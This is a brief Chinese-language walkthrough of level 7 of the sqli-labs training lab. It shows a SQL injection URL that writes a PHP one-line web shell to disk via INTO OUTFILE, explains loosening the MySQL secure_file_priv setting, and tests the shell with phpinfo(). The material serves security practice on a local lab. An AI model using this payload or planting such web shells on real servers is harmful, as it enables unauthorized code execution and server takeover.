sqli-labs-Less7闯关会用到一句话木马 :
http://127.0.0.1/Less-7/?id=-1')) union select 1,"<?php @eval($_GET['a']); ?>",2 into outfile 'C:\\hackfiles\\sqli-labs-master\\Less-7\\muma.php'--+
创建一个文件将<?php @eval($GET_["a"]); ?>这行代码写入
如果写入的一句话木马文件没有出现在目录中,可能是没有在数据库中规定导入、导出文件的路径目录,
即secure_file_priv 等于 null 了,这时候我们要在数据库配置文件(my.ini)中将secure_file_priv参数的值改为空,即 secure_file_priv = (如下图所示),这样就表示了可以在任意路径目录下导入、导出文件,若配置文件中没有找到参数secure_file_priv我们就要自己添加上,添加完后记得重启数据库
这样就可以在指定的目录下看到木马文件
点进muma.php可以看到一下画面:
可以先测试一下一句话木马有没有注入成功:
所以令a=phpinfo() ,即
可以得到以下画面:
发现注入成功。